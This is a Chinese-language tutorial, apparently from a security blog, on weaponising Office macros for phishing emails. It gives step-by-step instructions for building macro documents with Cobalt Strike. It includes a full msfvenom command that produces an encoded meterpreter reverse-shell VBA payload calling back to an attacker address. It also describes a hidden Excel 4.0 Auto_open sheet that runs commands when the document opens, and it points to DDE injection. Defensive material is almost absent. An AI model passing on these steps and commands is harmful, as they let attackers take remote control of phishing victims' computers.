釣魚郵件之office宏攻擊

前言

office宏攻擊是釣魚郵件場景中最常見的攻擊手段，其制作簡單，兼容性強，非常適合批量攻擊，但由于其需要用戶交互，隱蔽性差，攻擊能否成功基本取決于目標的安全意識強弱。

宏病毒

office宏病毒一般寄存于office文檔中，如word，excel，ppt，以excel最常見，當用戶打開這種文檔時，內置的宏命令就會執行，在計算機中執行惡意命令。

一般的惡意命令會自動訪問提前部署好的惡意服務器下載木馬程序到本地并運行，從而控制計算機。

攻擊示例

CobaltStrike生成office宏病毒

使用CobaltStrike的宏病毒生成功能可以輕松生成惡意宏代碼，部署CobaltStrike服務器并打開客戶端，創建一個監聽器

然后點擊Attacks-Package-MS Office Macro-選定監聽器-生成對應的宏病毒-復制到剪貼板

然后創建一個新word-視圖-查看宏中新建一個宏名

在里面粘貼剛才復制的宏，并在保存時點擊否另存為.doxm文件

當打開word文檔并點擊啟用宏代碼時，就會觸發宏，反彈shell到Cobalt Strike中

msf生成vba文件

使用msf生成vba文件：

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=xx.xx.xx.xx lport=4444 -f vba -o 123.vba

后面的步驟與CobaltStrike中相似，創建一個新word-視圖-查看宏中新建一個宏名

在里面粘貼剛才復制的宏，并在保存時點擊否另存為.doxm文件

當打開word文檔并點擊啟用宏代碼時，就會觸發宏，反彈shell到msf中

使用excel4.0宏執行命令

創建一個word或excel文檔，如果是word需要插入excel工作表

右鍵點擊底部的sheet-插入，選擇MS Excel 4.0宏表

在表格中寫入= EXEC(“calc.exe”)

點擊此格，將單元格命名為Auto_open，并可以將此sheet右鍵隱藏，重新打開word文檔將會自動執行命令。

在excel中嵌入宏代碼

excel中可以直接嵌入dde指令，參考csv注入中的攻擊方式即可。

參考文檔：http://uuzdaisuki.com/2020/07/16/csv%E6%B3%A8%E5%85%A5%E5%88%A9%E7%94%A8%E5%92%8C%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/